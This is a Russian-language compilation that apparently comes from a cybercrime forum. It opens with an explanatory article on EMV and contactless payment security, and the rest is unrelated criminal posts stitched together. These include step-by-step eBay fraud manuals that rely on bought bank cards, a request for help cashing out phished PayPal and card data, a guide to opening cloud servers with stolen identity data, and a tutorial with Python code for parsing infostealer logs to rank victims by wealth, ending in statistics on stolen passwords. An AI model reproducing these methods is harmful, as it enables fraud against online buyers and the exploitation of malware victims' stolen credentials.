В первом методе использовалось только одно статическое поле, хранящееся на карте. Оно подписывалось приватным ключом и проверялось терминалом. Это было EMV-поле AIP (application interchange profile). Но консорциум EMV быстро понял, что для популярных в то время офлайновых терминалов (они не выходили в онлайн для сверки криптограммы) этого было явно недостаточно — любой мог клонировать публичный ключ и подписанную статическую строку, чтобы создать подделку.
Следующий метод полагался на динамические данные, приходящие от терминала. Терминал генерирует поле UN — Unique Number, которое подписывается приватным ключом карты. Энтропия этого поля — 232, чего достаточно для защиты от первой атаки.
Однако в 2009 году исследователи из Кембриджского университета представили работу, описывающую так называемую атаку PIN OK (PDF). Специальное устройство, располагающееся между картой и терминалом, совершало атаку «человек посередине» и подменяло одно из полей, которые отправляла карта. Эту подмену нельзя было обнаружить на терминале с помощью описанных выше методов. Для защиты от таких атак консорциум EMV еще до находки исследователей предусмотрел новый механизм защиты — схему CDA. Во время нее терминал может проверить целостность большинства полей, которые передает карта и которые участвуют в фазе под названием «риск‑менеджмент».
Офлайновая аутентификация создавалась в первую очередь для защиты офлайновых платежей, когда терминал не подключен к интернету постоянно. Именно поэтому, если результат работы режимов DDA или CDA не заканчивается успехом, в современных терминалах, подключенных к интернету, это не приведет к отказу транзакции в 99% случаев, так как банк‑эмитент авторизует ее с помощью криптограммы, как описано ниже. Однако некоторые платежные системы рекомендуют обращать внимание на постоянные неуспешные аутентификации, особенно если они происходят в разных терминалах.
Есть два основных способа верификация плательщика: ПИН‑код и подпись. На самом деле их немного больше — ПИН‑код может проверяться в офлайне (на самой карте) и онлайн. Он может быть зашифрован (с помощью симметричного ключа 3DES) или передаваться в открытом виде.
Еще возможен способ верификации NoCVM — то есть отсутствие верификации. Хороший пример таких операций — те, которые не превышают лимиты 3000 рублей и не требуют ввода ПИН‑кода. Их иногда называют Tap & Go.
Другой способ, который в зависимости от платежной системы называется CDCVM или On-Device CVM, делает возможной верификацию на мобильном телефоне владельца карты. Как ты уже догадался, он используется в Google Pay и Apple Pay.
Для авторизации транзакции смарт‑карты создают платежную криптограмму. Карта отправляет терминалу список полей — их набор зависит от версии криптограммы и настроек карты. Как правило, это сумма операции, валюта, дата и другие важные для этапа риск‑менеджмента настройки терминала. Далее карта дополняет эти поля своими внутренними полями: счетчик операций, версия криптограммы.
Полученная строка шифруется с помощью записанного на карте секретного ключа 3DES в режиме цифровой подписи и передается банку вместе со всей подписанной информацией. Банк‑эмитент использует аппаратный модуль безопасности (hardware security module, HSM), на котором в защищенной от чтения области памяти содержится копия симметричного ключа карты.
HSM также создает цифровую подпись по данным от платежного терминала. Если он получит такую же криптограмму, то транзакция будет считаться авторизованной. Это значит, что никто не подменил данные операции во время их передачи от карты до банка эмитента. На этом же этапе расшифровывается и сверяется ПИН‑код карты, в случае если используется онлайн‑сверка ПИН.
Обрати внимание, что все эти три функции работают хорошо только вместе. Чтобы корректно работала верификация, она должна контролироваться с помощью аутентификации. Если нет авторизации — вся транзакция становится высокорисковой, и так далее.
Бесконтактные платежи стали набирать популярность с середины 2010-х годов. Банки и платежные системы продвигают их как быстрый и удобный способ оплаты. Оно и понятно — чем больше народ платит картами, тем больше можно заработать на комиссиях! С развитием технологий нужно развивать и безопасность, но это далеко не всегда так. И бесконтактные платежи как раз пример из неудачных.
Когда создавались бесконтактные платежи, карты с чипом в США еще не были особенно распространены, поэтому Visa и MasterCard предусмотрели промежуточный шаг, когда новыми бесконтактными картами можно платить на старых несовременных платежных терминалах, которые не поддерживают современную криптографию. Этот шаг называется Legacy modes — режимы, степень безопасности которых значительно ниже, чем у платежей EMV и современных форм бесконтактных платежей.
Legacy modes по степени защиты больше напоминают операции с магнитной полосой, только проводятся через NFC. Несмотря на то что эти режимы предполагалось использовать лишь в нескольких странах, а через какое‑то время и вовсе отменить, мы в 2020 году встречаем их повсеместно — в том числе в России, где даже магнитная полоса запрещена.
Отдельная проблема — это то, как платежные системы подошли к реализации бесконтактных платежей. Вместо того чтобы придумать что‑то новое, в компаниях Visa и MasterCard решили и здесь использовать EMV, но каждая сделала это по‑своему, так что де‑юре они перестали быть частью стандарта EMV.
Что из этого следует:
В компании Visa были недовольны слишком долгим временем проведения платежа. Когда для этого использовался чип, проблем не было — карта вставлялась в терминал. Однако в Visa посчитали, что держать карту у терминала, ожидая, пока пройдут все шаги EMV, — это не очень‑то удобно. Этап, который вызывал основную задержку, — это офлайновая аутентификация карты.
Одновременно с этим в MasterCard приняли диаметрально противоположное решение — признали, что офлайновая аутентификация важна и для тех карт, которые поддерживают наиболее безопасную схему аутентификации CDA, и сделали ее обязательной. В спецификации EMV, если взаимодействие по схеме CDA не заканчивается успешно, терминал все еще может отправить криптограмму для онлайновой авторизации. Тогда как для бесконтактных платежей MasterCard неудачная аутентификация CDA всегда ведет к отмене платежа. Разница во времени операций незначительная, однако это остается решающим фактором для Visa.
Теперь, когда ты знаешь, как работают электронные и в том числе бесконтактные платежи, ты готов к разговору об уязвимостях в этих схемах. Это мы обсудим в следующих статьях, а заодно разберем самые громкие кейсы мошенничества.
Автор Тимур Юнусов
хакер.ру
Я лично не поддерживаю закрытие RaaS так как это приносит хороший и очень хороший доход.
По поводу развития: у людей у которых есть деньги имеют больше возможности развиваться, чем те люди у которых они отсутствуют или кто работает на заводе, грузчиками, продавцами и т.д. Локеры уменьшали порог входа в бизнес, до локеров существовали только FIN APT-группы, но там намного больше порог входа и намного меньше прибили, и меньше контор куда можно проникнуть и получить $.
А теперь стал вопрос: а что делать с доступами? Кроме продажи есть другие способы монетизации?
Ни для кого не секрет, что иностранцы широко используют покупки в интернет. Порой доходит до смешного, даже воду и туалетную бумагу заказывают на Ebay.
В этой торговой площадке есть система отзывов на продавца, а так же система возврата средств. НО всегда есть большое НО! вернуть деньги тебе могут только в том случае, если не вышел срок жалобы 45 дней и только если оплата была совершена через PayPal. Во всех прочих случаях курите бамбук! Таким образом если тебе оплатили на банковский счет, на возврат можно не надеяться. В нашем случае будет именно так.
Для того чтобы зарегистрироваться в системе Ebay нужно изучить процедуру с помощью гугла. Сложностей нет никаких. Если при регистрации пользоваться скажем яндекс браузером, то он автоматически переводит страницы и разобраться с регистрацией не сложно.
Сразу оговорюсь, что регистрация на площадке влечет за собой некоторую подготовку. Нужно иметь адрес, желательно иностранный. Также нужно иметь карточку банка для регистрации PayPal. Здесь тоже все просто. Я обычно покупаю готовые карты. Беру карты как правило голд или платину, потому что с них выводить можно единоразово от 1 до 3-х миллионов. Сразу же заказываю:
Регистрирую PayPal на эту карту.
Как только у меня на руках есть PayPal, я приступаю к регистрации на Ebay. Здесь важен факт, чтобы все было написано не кириллицей, а латиницей. В ебее основным адресом ставим адрес по месту прописки собственника карты, то есть российский адрес. Вторым пунктом ставим адрес для доставки посылок европейского местонахождения (посылки мы получать не будем, в прочим как и отправлять).
На этом этапе могут попросить копии паспорта или другого документа. В 1 из 6-и случаев так было, но это не обязательная процедура, может и не понадобится. Если запросили, то забываем про аккаунт и регистрируем другой. Важно выждать 2-3 дня прежде чем привязывать к аккаунту свой PayPal и карту. Потому как если привязать сразу, а у вас запросили копии документа, то повторно к другому аккаунту этот PayPal и карту привязать уже не возможно.
Вот у нас есть аккаунт в Ebay и PayPal счет. Здесь есть тонкий момент, с PayPal вы не можете вытащить сумму более 1,5 евро в месяц если вы не проверенный пользователь. Поэтому, рекомендую сразу не использовать PayPal в качестве приема оплаты за товар. С PayPal деньги могут вернуть назад, а со счета карты нет. Оставляем только одну возможность принять деньги на карту.
Итак где берем европейский адрес? Заходим в Евау на любого продавца, спускаемся в самый низ и видим его адрес. Копируем его адрес изменяя только номер дома и вставляем этот адрес в пункт приоритетный адрес для посылок. Имя и фамилию латиницей собственника карты.
Теперь наш аккаунт готов, и мы можем предлагать товар.
Замечу сразу, что у вас нет ни одного отзыва о покупках и продажах, а это значит вам не очень много доверия. Что делать?
Заходим к китайцам в магазины, и покупаем всякую ерунду - брелок, ручка, резинка для волос, все что не дороже 1 евро и все что доставляется бесплатно, чтобы не переплачивать за доставку. Вероятность того что китайцы пошлют товар стоимостью 1 евро в Европу ровна нулю!!! То есть на адрес который указан в аккаунте ничего не придет. Но китайцы вам мгновенно поставят отзыв, что вы класный ебейер. У меня ни разу ни один китайский товар не пришел ни на реальный адрес ни на левый. Вообще китайцы кидают часто. Особенно если доставка у них бесплатная. А если она стоит 3-5 евро, то товар раньше чем через 2 месяца не приходит.
И так вы имеете 5-6 отзывов, хорошо если 25-30, но это уже как вам хочется, есть деньги можете набить отзывов по больше.
В принципе, на этом этапе достаточно чтобы графа отзывы просто не была пустой. сами отзывы читать никто не будет.
Теперь вопрос что продаем?
А продаем мы с вами фотоаппараты, видео камеры, очень хорошо идут обьективы кэнон с ценой от 1000 евро за новый.
Что мы с вами делаем? Проходим по аукционам на БУ товар этой категории, копируем все фотографии с аукциона, также копируем описание этого товара на немецком языке. Выжидаем когда конкретный аукцион кончится и через неделю выставляем на продажу те же самые товары с тем же самым описанием.
Копировать фотографии и инфу о товаре надо за ранее и выставлять не раньше чем через 40-60 дней. И копировать только данные с частных продаж и не коем случае не с магазинов на ебее. Как отличить магазин от частной продажи разобраться легко. У частника товара мало 3-7 лотов, у магазина внутри все выглядит иначе и товара от 200 единиц и больше.
Аукцион рекомендую брать от 7 до 10 дней. Меньше не стоит. Посещений больше, заявок больше.
Аукцион выставлять ТОЛЬКО от 1 евро. Не ставить от 100 и выше ни в коем случае. Вся фишка в том, что если стоит объектив Б/У в отличном состоянии 1 евро, то набивать его начнут сразу, если от 100 евро и выше, ждать придется почти до конца аукциона, и вероятность того что его купят за 101 евро очень велика, а вы должны его продать за 800-950 евро. Таким образом тот кто начал давать ставки он постоянно в курсе противоположных ставок и наблюдает за аукционом, тем самым постоянно повышая свою ставку.
Итак что мы имеем?
Пример: Canon EF 2,8 24-70mm II L USM новый с магазина стоит 1500 евро, продадите его вы не меньше чем за 800 потому что он Б/У.
Далее вам дали максимальную ставку на "ВАШ" товар и его купили на аукционе. Купили на аукционе это не значит что оплатили! Всегда есть вероятность осечки, что могут от аукциона отказаться, но в этом случае право покупки переходит к тому кто сделал ставку на пункт ниже.
И так у вас его купили и теперь может возникнуть вопрос оплаты. Клиент видит карту, но она русская, а какая проблема? Вообще то VISA это международная система оплаты, так что милости просим, вот реквизиты. Ну если совсем тупит, то пусть платит на PayPal но мы с вами помним, вы не проверенный клиент пейпала и вывод больше 1,5 тысяч евро в месяц не возможен. По этому, сумма не должна быть выше, а главное как только деньги на пейпал попали, в этот же день выводим на карту и в этот же день их снимаем. На карте ничего не держим, потому что клиент не получив свой объектив через заявленных 3 дня доставки возбуждает дело на ебее о возврате средств, которые автоматически списываются с пейпала и так же автоматически уходят с карты если они там есть. Ну, а если нет на карте, то вешается минус. Но мы то с вами карту уже выкинули и забыли про нее давно.
Работал по нему в 2016-2017 году, Нагибали буржуев Ebay в EU и USA.
Ссылка на курс - https://yadi.sk/d/Me3xauDS3Pgzk5
Ссылка на описание - https://yadi.sk/i/aJNQfu_SA1ES4g
Рекламка к курсу - https://yadi.sk/i/n8D_oPQP3KiJ7D
Для начала работа с ebay.de
Покупаем акк Ebay (сортировка по количеству селлерских отзывов). Я еще смотрю, чтобы последние отзывы были год и более назад. Такие акки на 90% не активны/заброшены.
Покупаем сразу 3-4 акка. Чекаем на валидность логин/пасс.
Если не проходим - делаем возврат и снова берем.
Телефон можно предварительно взять бесплатный здесь textnow.com
Поменяли данные в акках и откладываем их на некоторое время.
Далее озаботимся приемом денег в зоне de.
Ищем селлера готовых карт Payoner, Alipay и другие. Заказываем карту, оплачиваем.в течении недели получаем курьеркой. Раньше Payoner слали в РУ в почтовый ящик на сканы, если дешёвую доставку выбрать, сейчас ни знаю точно отправят простым конвертом чтобы кинули в ящик почтовый или нет!
Активируем карту на сайте пионера, загружаем там же присланные доки, далее заходи в Global Payment Service, копируем оттуда данные по счету в Евро.
Пока ждем карту занимаемся подготовкой товара.
Выбираем, что хотим продать. Желательно о товаре знать все. Какие номера, серийники и пр. Найти гарантийные сертификаты, сертификаты подлинности и пр. Подобрать/обработать фотографии не только товара, но и упаковки, сертификатов, чеков и прочее.
Ты должен знать "историю" товара: где купили, когда купили. История должна совпадать с серийниками, чеками и прочим вещам по которым её можно проверить.
Дорогие вещи пробиваются очень часто, в том числе у офф производителя.
Далее размещение. Берем один из акков, входим и меняем там имя на держателя нашей карты пионер. Меняем только имя. Все остальное оставляем.
Размещаем товар, в качестве оплаты указываем - банк счет. Вставляем туда данные по тому счету, который получили в пионере.
Я размещаю обычно аукцион на 5-7 дней. Перед размещением в зоне de можно посмотреть лимиты продавца и выставить 2 или 3 лота, если по лимитам проходят. Лоты лучше из одной категории. Не стоит электронику с ювелиркой смешивать.
Дальше начинается самое интересное.
Начинается куча вопросов: товар настоящий? есть чеки, сертификаты? почему не принимаешь палку? и прочее....прочее....
Отбиваешься от всех любопытных. Рассказываешь историю товара, светишь в личку чеки (лучше сначала с закрытыми серийниками), сертификаты.
Как правило, такие ауки идут сначала вяло, но в последние 2-3 часа до конца цена поднимается.
Победителю отсылаешь инвойс со своими реквизитами пионерки.
Здесь может быть вариант с долгой перепиской:
Включаешь СИ и отвечаешь что палки нет и не будет (не любишь ты ее и прочее), наложенным платежом не высылаю, на месте не торгую.
И вообще, это все нарушение политики ebay и я буду жаловаться о подозрении на мошенничество с вашей стороны, если не прекратите и не оплатите. Или отказывайтесь от покупки.
Последняя фраза - самая действенная.
Если свалили и отказались от покупки. Ты официально через Ebay подаешь Second Chance Offer второму по списку победителю. Если его не заинтересовало - выставляешь товар заново.до 5000 евро.
Всем шалом.Познаю что такое фишинг,получается по чучуть.Поимал к примеру
данные paypal, как мне им завладеть?Тагже и банковские карты. Проблема с (3DS)
Тежело однаму все познавать)
Нету рядом тех кто подскажет.
За любую инфу буду вам благодарен!!!
Мануал как сделать рабочий дедик, без оплаты.Подойдет для разных целей в том
числе для теста разного софта под логи и т.п
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Для этого вам понадобится:
• Создание киви кошелька
• Подделываем свои данные
• Получаем сервер
Данные для верификации берем от сюда <https://www.reestr-
zalogov.ru/search/index>.
Вводим рандомные ФИО и ищем.
Переходим в любую из этих ячеек и получаем данные для верификации, могут быть
и невалид:
Вводим данные в киви, через пару минут будет уже основной аккаунт.
Оформляем виртуальную карту киви, получаем данные для карты путем ввода смс
Регистрируем аккаунт в майкрософт.
Переходим на https://azure.microsoft.com/ru-ru/free/ Вводим при регистрации
российские или белорусские адреса, рекомендую вводить настоящие адреса меньше
вероятность бана, данные карты с нашего киви берем, с карты.
Заходим сюда для создания нашего дедика:
Заходим в конфигурации дедика:
Выбираем конфигурацию нашего дедика до 200$ в месяц.
Дальше ничего сложного, создаем и подключаемся по логин:пароль, которые вы
указали при создании дедика.
Сабж. Неуверен подходит ли данный форум для этого вопроса, но на мой взгляд подходит. Интересуют ваши мысли\опыт по данной теме. Топ100 не предлагать =) Мне в голову приходит только создание словаря на основе слитых баз по нужному гео, однако не понятно как именно выбирать из данных баз? Всем спасибо заранее.
Hidden content for authorized users.
Подготовка:
А вот теперь самая изюминка:
После каждого аккаунта желательно удалять машину из nox player и добавлять по новой.
Это тот способ, про который я рассказывал тут
Если Google за нами следит то почему мы не можем следить за Google?
Окей, как ты можешь чекнуть логи?
Прежде всего, буду исходить из того, что прогноз строиться именно на мета- данных, совершенно на затрагивая пароли, они не обязательны, чтобы понять, подходящий ли этот лог для тебя или нет. В расчет возьму исключительно данные про систему и историю посещений в браузере. Не критическая и не чувствительная информация.
Какие знания тебе будут реально полезны о неизвестных логах? Наверное, хотелось бы вообще понять, а стоит ли на них тратить время. Дата пролива, стата по странам и кол-во фейсбук паролей - это совсем поверхностная инфа. Кто вообще подхватил стилер, домохозяйка или богатенький крипто-буратино?
Буду стремиться к тому, чтобы можно было предсказывать по логу, сколько финансовых активов имеет человек в виртуальном пространстве. Деньги, крипта, серверы, доступы, вычислительная мощность и пр. ресурсы.
Но при этом, я понимаю, что никому не нужны абстрактные гадания на кофейной гуще, поэтому все будет исключительно практично и применимо в реальной жизни.
Просто загрузив Information.txt и Software.txt из всех логов можно получить вот такую версию чека логов:
Data Mining
Чтобы начать собирать данные для анализа и последующего обучения искусственного интеллекта, беру пачку логов, можно скачать в паблике поюзанные логи и отрыть много чего ценного, найти с десяток иголок в стоге запревшего сена с помощью математики.
Собираем данные из Information.txt, вычислительные мощности комьютера много о чем могут рассказать. Пример регулярки для одного из форматов логов:
Python:Copy to clipboard
lookups_information = {'system locale': ['System locale: (.*)'],
'country': ['Country: (.*)'],
'city': ['City: (.*)'],
'layouts': ['Keyboard layouts: (.*)'],
'cpu': ['CPU info: (.*)'],
'gpu': ['GPU info: (.*)'],
'ram': ['Amount of RAM: (.*)'],
}
Собираем данные из Software.txt, список установленного софта на компьютере. По нему можно очень много сказать.
Python:Copy to clipboard
lookups_software = {'software': [r'\t(.*)']}
Аналогичным образом пишем шаблон под сбор данных Url и Title из истории посещения браузера.
Пишем цикл, который проходиться по всем директориям или архивам с логами и
находим выше упомянутые файлы, парсим их содержимое регуляркой из словаря.
Моя тестовая выборка - 1050 папок логов.
Собрав все данные, уже чешуться руки их проанализировать, упорядочить и увидеть картинку вцелом. Причесав и почистив их, в первом приближение получается примерно такая статистика установленного софта, привожу верхи и низы:
Spoiler: Простыня софта
Microsoft Visual C++ 2008 Redistributable : 1115
Microsoft Visual C++ 2005 Redistributable : 776
Google Update Helper : 756
Microsoft Visual C++ 2013 Redistributable (x64) : 666
Google Chrome : 665
Microsoft Visual C++ 2013 Redistributable (x86) : 639
Microsoft Visual C++ 2012 Redistributable (x86) : 571
Microsoft Visual C++ 2012 Redistributable (x64) : 540
Microsoft Visual C++ 2012 x86 Minimum Runtime : 508
Microsoft Visual C++ 2012 x86 Additional Runtime : 508
Microsoft Visual C++ 2013 x86 Minimum Runtime : 473
Microsoft Visual C++ 2013 x86 Additional Runtime : 473
Microsoft Visual C++ 2010 x86 Redistributable : 457
Realtek High Definition Audio Driver : 432
Update for Microsoft Office 2010 (KB2553347) 32-Bit Edition : 402
DiskProtect190001 version 19.01 : 376
Update for Microsoft Office 2013 (KB3039720) 32-Bit Edition : 362
Intel(R) Processor Graphics : 343
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition : 336
Microsoft Visual C++ 2017 Redistributable (x64) : 280
Service Pack 1 for Microsoft Office 2013 (KB2850036) 32-Bit Edition : 263
Microsoft Visual C++ 2017 Redistributable (x86) : 246
Java Auto Updater : 224
Microsoft Visual C++ 2017 x86 Minimum Runtime : 218
Microsoft Visual C++ 2017 x86 Additional Runtime : 218
Microsoft Visual C++ 2015 Redistributable (x86) : 195
Microsoft Visual C++ 2015 x86 Minimum Runtime : 192
Microsoft Visual C++ 2015 x86 Additional Runtime : 192
Adobe Refresh Manager : 185
Adobe Acrobat Reader DC : 173
Microsoft Office Professional Plus 2010 : 166
Microsoft Visual C++ 2015 Redistributable (x64) : 164
Empty : 161
Steam : 153
Microsoft Office 2007 Service Pack 3 (SP3) : 141
Realtek Ethernet Controller Driver : 140
Main service : 137
Adobe AIR : 132
Microsoft Office Enterprise 2007 : 124
Realtek Card Reader : 108
Microsoft Office Proofing Tools 2013 : 102
Apple Software Update : 98
Microsoft Visual Studio Tools for Applications 2012 x86 Hosting Support : 98
Launcher Prerequisites (x64) : 95
VLC media player : 95
TeamViewer 14 : 94
Microsoft Office Proof (English) 2010 : 93
Internet Download Manager : 92
Office 16 Click-to-Run Localization Component : 91
2007 Microsoft Office Suite Service Pack 1 (SP1) : 91
Office 16 Click-to-Run Extensibility Component : 90
Intel(R) Chipset Device Software : 90
Visual C++ 2008 : 88
NVIDIA Stereoscopic 3D Driver : 87
Microsoft VC++ redistributables repacked. : 87
Adobe Creative Cloud : 86
Microsoft Office Proof (English) 2007 : 86
Microsoft Office Professional Plus 2013 : 84
Catalyst Control Center Localization All : 79
Farm Animal Sounds : 1
Spooky Sounds : 1
Paxscan 1515DXT (SN:A01S03-0909) Receptor : 1
Counter Strike Source v34 : 1
Counter-Strike Source [v34] : 1
DAEMON Tools Pro Advanced : 1
Kate 17.08.1-KF5.38-64bit : 1
Skype, âåðñèÿ 8.50 : 1
WinRAR 5.50 (32-ðàçðÿäíàÿ) : 1
VPNGame, âåðñèÿ 3.2 : 1
Samsung ML-2160 Series : 1
Samsung Universal Print Driver 2 : 1
SSC Service Utility v4.30 : 1
TKD Scorer Basic Version 1.2.0.60 : 1
TransMac version 11.2 : 1
Wise Data Recovery 4.1.2 : 1
quickorder : 1
HP LJ300-400 color M351-M451 : 1
hppusgCM1312 : 1
hppFaxDrvM276 : 1
Amadeus : 1
hpStatusAlertsM351_M451 : 1
HP LaserJet 200 color MFP M276 Fax : 1
CustomerResearchQFolder : 1
hppToolboxProxyM351 : 1
D2600 : 1
hppSendFaxM276 : 1
DJ_SF_05_D2600_Software_Min : 1
Ashampoo Burning Studio FREE : 1
hppM351_M451LaserJetService : 1
Aspel-COI 8.0 : 1
Brother MFL-Pro Suite DCP-T500W : 1
HPLaserJet300-400ColorM351-M451Series_HelpLearnCenter_SI : 1
hpbM351M451DSService : 1
HP LaserJet 200 color MFP M276 : 1
HP LaserJet 200 color MFP M276 HP Device Toolbox : 1
HPLJUTM351-M451 : 1
HP LJ200 M276 HP Scan : 1
hpStatusAlertsM276 : 1
iCare Data Recovery Software3.7.1 : 1
Dell Resource CD : 1
Update for Microsoft Office 2013 (KB2726961) 32-Bit Edition : 1
Update for Microsoft PowerPoint 2013 (KB2727013) 32-Bit Edition : 1
Update for Microsoft Office 2013 (KB2752094) 32-Bit Edition : 1
Update for Microsoft Visio 2013 (KB2810008) 32-Bit Edition : 1
Definition Update for Microsoft Office 2013 (KB2760587) 32-Bit Edition : 1
Update for Microsoft Word 2013 (KB2768007) 32-Bit Edition : 1
Update for Microsoft Office 2013 (KB2767845) 32-Bit Edition : 1
Update for Microsoft Office 2013 (KB2752025) 32-Bit Edition : 1
Update for Microsoft Visio Viewer 2013 (KB2768338) 32-Bit Edition : 1
Update for Microsoft Office 2013 (KB2810014) 32-Bit Edition : 1
Update for Microsoft Access 2013 (KB2760350) 32-Bit Edition : 1
Update for Microsoft PowerPoint 2013 (KB2726947) 32-Bit Edition : 1
Update for Microsoft SkyDrive Pro (KB2767865) 32-Bit Edition : 1
Update for Microsoft Office 2013 (KB2752101) 32-Bit Edition : 1
Update for Microsoft Office 2013 (KB2737954) 32-Bit Edition : 1
Adobe Flash Player 21 ActiveX : 1
Mozilla Firefox 68.0.1 (x86 pt-BR) : 1
Ajuda e Suporte da Dell : 1
Planet Coaster : 1
hpStatusAlertsM127-M128 : 1
hppM125LaserJetService : 1
HPLJUTM127_128 : 1
HP LJ M127128 Scan HP Scan : 1
HP LaserJet Pro MFP M127-M128 : 1
HP LaserJet Pro MFP M127-M128 HP Device Toolbox : 1
System Ninja versão 3.2.7 : 1
Sims 4 Tray Importer (S4TI) 1.6.7.9 : 1
HPLJProMFPM127M128 : 1
HP LaserJet Pro MFP M127-M128 Fax : 1
Maui META 3G ver 6.1316.1 : 1
°\x99\x13\x01 : 1
StopUpdates10 versión 1.10.13 : 1
Importación de SketchUp 2016-2017 : 1
Xerox PowerENGAGE : 1
Aplicaciones destacadas de Autodesk 2016-2017 : 1
Skype version 8.48 : 1
UniKey, âåðñèÿ 4.2 RC4 : 1
Screenshot 2.1.0 : 1
Outils de verification linguistique 2013 de Microsoft Office\xa0- Francais : 1
NC Launcher 2 : 1
PremiumSoft Navicat Premium 8.2 : 1
Lineage® II: Freya (High Five) : 1
SlimDX SDK (January 2012) : 1
.NET Reflector Desktop 10 : 1
Anki : 1
K-Lite Mega Codec Pack 14.1.0 : 1
oCam versão 480.0 : 1
Chromium Updater version v2 : 1
TubeDigger 6.6.9 : 1
Vopt 9 : 1
K-Lite Codec Pack 10.6.0 Full : 1
MpcStar 3.1 : 1
V-Ray for SketchUp adv : 1
IESviewer 2.99n : 1
Solid Converter PDF : 1
Adobe Reader XI (11.0.06) : 1
Digital Line Detect : 1
Intelbras Icti Impacta Manager 3.02.19 : 1
Intelbras Icti Impacta Manager : 1
Intelbras Programador PC-WEB Impacta V3.10.07 : 1
Mozilla Firefox 28.0 (x86 pt-BR) : 1
Programador WEB 2.0.06 : 1
Еще немного данных:
Spoiler: Домены по странам
google.com 1275
{'Brazil': 146, 'India': 88, 'Turkey': 68, 'Romania': 67, '': 51, 'Spain': 50,
'Indonesia': 49,
facebook.com 1252
{'Brazil': 167, 'Bangladesh': 97, '': 94, 'Turkey': 91, 'Indonesia': 68,
'Mexico': 60, 'India': 54,
instagram.com 145
{'Brazil': 25, 'Turkey': 19, 'Spain': 13, 'India': 8, '': 8, 'SouthAfrica': 6,
'Indonesia': 6,
github.com 18
{'Romania': 4, 'Indonesia': 2, 'Switzerland': 2, 'SriLanka': 2,
blockchain.info 2
{'Brazil': 2}
Немного еще данных о текущей пачки логов:
Сбор информации это уже расширенный парсер, которые продаются на площадка,
поэтому не хотелось бы забирать хлеб и делиться подробным исходным кодом, хоть
он и вовсе простой для средней руки программиста:
Python:Copy to clipboard
regexp_file = r'Information'
for root, dirs, files in os.walk(workdirectory):
for filename in files:
re_filename = re.search(regexp_file, filename)
if re_filename:
abspath = os.path.abspath(root + '/' + filename)
results.append(abspath)
Тут мы собираем все файлы Information.txt из директории с логами. Собрав все файлы, их необходимо распарсить по регуляркам, указанным выше, например с помощью такой функции:
Python:Copy to clipboard
f = open(file_path, 'r', encoding="ISO-8859-1")
file_data = f.read()
f.close()
for lookup_dict_key in lookups_dict:
for lookups_dict_query in lookups_dict[lookup_dict_key]:
result = re.findall(lookups_dict_query, file_data)
if lookups_information == lookups_dict:
try:
if 'layouts' in lookup_dict_key:
result = result[0].split(' / ')
if 'ram' in lookup_dict_key:
result = [re.search(r'^(.*?GB)\s', result[0]).group(0)]
results_dict[lookup_dict_key] = result[0]
except Exception as e:
pass
Python:Copy to clipboard
Очевидно, что Google и другие большие братья анализируют наши интересы и на истории посещений браузера могут делать довольно точные выводы.
В нашем же распоряжении находиться не просто история посещения, которая доступна Google, но и много других мета-данных. Можно сказать, что в принципе, мы обладаем большей информацией о пользователе компьютера чем любая другая корпорация (ну Microsoft же честный, правда?)
Загружаем уже всю собранную мета-информацию в базу и получаем нечто подобное:
При дальнейшем анализе и для практической пользы, необходимо ввести дополнительный параметр, который собирать нужно вручную. Давайте подумаем вместе, что это может быть? В идеале, это баланс электронных и банковских кошельков пользователя. Но для этого нужна реальная практика людей, кто работает с логами. Пока разделив условно на:
Собираем эти шаблоны в словари и натравляем на историю посещений. Таким образом выявляем категории пользоватлей и уже можем сложить предварительно впечательное о базе и сделать необходимую выборку.
Наверняка, можно так же догадаться о том как часто человек делает покупки, если в его истории посещений можно checkout и cart, собрать только тех кто недавно делал где-либо покупку.
Не говоря уже о том, чтобы сделать полную выгрузку со статистикой самых популярных по использованию сайтов из всей базы. Привожу пример результата парсинга чувствительных данных, а именно паролей из passwords.txt:
Python:Copy to clipboard
{'accounts.google.com': 1154, 'facebook.com': 753, 'login.hotspot1': 405, 'login.live.com': 399, 'twitter.com': 220, 'm.facebook.com': 168, 'speed.ps': 156, 'netflix.com': 155, '192.168.1.1': 154, 'instagram.com': 145, 'mega.nz': 138, 'bamwar30.com': 128, 'login.yahoo.com': 126, 'paypal.com': 120, 'discordapp.com': 108, 'accounts.epicgames.com': 98, '192.168.0.1': 97, 'linkedin.com': 94, 'amazon.com': 92, 'opss52.com': 90, 'dropbox.com': 88, 'bamwar29.com': 87, 'roblox.com': 84, 'sbbam2.com': 83, 'zQxb6hXv1MJiC1Yyotdhi8HP-y7fwPcOLwPOWTwWKpP2VXcbsuIiI4iJ1KV0Dz3LzVsUuKJmYCBIUAxnsPB9FA==@com.facebook.katana': 82, 'sbbam.com': 82, 'opstar06.com': 78, 'store.steampowered.com': 77, 'steamcommunity.com': 77, 'opstar04.com': 74, 'yt580.org': 74, 'opstar05.com': 68, 'idmsa.apple.com': 65, 'signup.live.com': 65, 'adal5.com': 64, 'twitch.tv': 62, 'Jzj5T2E45Hb33D-lk-EHZVCrb7a064dEicTwrTYQYGXO99JqE2YERhbMP1qLogwJiy87OsBzC09Gk094Z-U_hg==@com.netflix.mediaclient': 62, 'yt220.org': 61, 'opstar07.com': 58, 'passport.twitch.tv': 55, 'account.mojang.com': 54, 'accounts.spotify.com': 54, 'uuhaja7.com': 53, '4shared.com': 52, 'coolthai.kr': 52, 'login.microsoftonline.com': 50, 'myaccount.google.com': 49, 'uuhaja6.com': 49, 'optime10.com': 49, 'optime11.com': 49, 'eokulyd.meb.gov.tr': 49, 'web.facebook.com': 48, 'optime5.com': 48, 'optime13.com': 48, 'api.twitter.com': 46, 'mercadolibre.com': 46, 'opstar03.com': 46, 'opss54.com': 46, 'account.samsung.com': 45, 'auth.riotgames.com': 45, 'signin.ea.com': 45, 'signin.ebay.com': 44, 'hesap.zulaoyun.com': 44, 'rumahnaga.org': 44, 'es-la.facebook.com': 43, 'login.aliexpress.com': 43, 'pt-br.facebook.com': 42, 'accounts.autodesk.com': 39, 'my.minecraft.net': 39, '99naga.com': 38, 'adal1.shop': 37, 'listjoe.com': 37, 'nagaqqhoki.net': 36, 'lsp-gtk-kemdikbud.id': 34, 'mail.rmgindustrial.com': 34, 'qbMQCZh-CU_SBn04UFat_bLMSicoFKWYI0MzXmOdBklD5gJcvH42kD8GXA5lvZmtq1ON0Dd8FAT6SLUIlwNUqA==@com.instagram.android': 33, 'mobile.twitter.com': 33, 'en-gb.facebook.com': 31, 'optime4.com': 31, 'mercadolivre.com': 30, 'nagaqq99.info': 30, 'auth.afip.gob.ar': 30, 'accounts.pubg.com': 29, 